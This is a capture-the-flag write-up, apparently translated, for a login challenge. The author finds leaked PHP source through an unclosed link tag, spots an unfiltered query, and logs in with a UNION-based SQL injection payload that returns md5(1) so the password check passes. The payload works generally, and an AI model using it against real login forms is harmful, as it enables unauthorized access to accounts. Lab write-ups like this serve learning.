Topic link: http://www.shiyanbar.com/ctf/62
Click on the topic link and find that it is an interface similar to login:
Let's start with the previous question: Can you log in? ? The idea of guessing that the background code is:
select * from user where username='str' and password='pastr'
We put a'=' on both username and password, but... no, well, another way of thinking.
The general idea is to start: view the request and response header information, and view the source code.
When looking at the source code, I found something incredible:
There is an unclosed <a> tag in the source code, which is not displayed normally in the front-end web page, so what is the content of this link, we click it and find that the content is PHP code, then the problem is temporarily changed to PHP audit:
Check the PHP code carefully. This code visually shows how the background works. The background logic here is to first pass the front-end Username value and the MD5-encrypted value of the Password into the background, and query the password corresponding to the username in the database through the sql statement. value, and then compare it with the value of Password in the background, observe the sql statement: select pw from php where user='$user'. This sentence is obviously injected by sql, and there is no filtering. All we need to do is to make the value returned by this sentence the same as the md5 encrypted value of the front-end Password value. Then our idea here is to directly use the opening and closing of quotation marks, and the comment of # to get the answer:
username: Username' union select md5(1) #
passname: 1
Easily get the Flag:
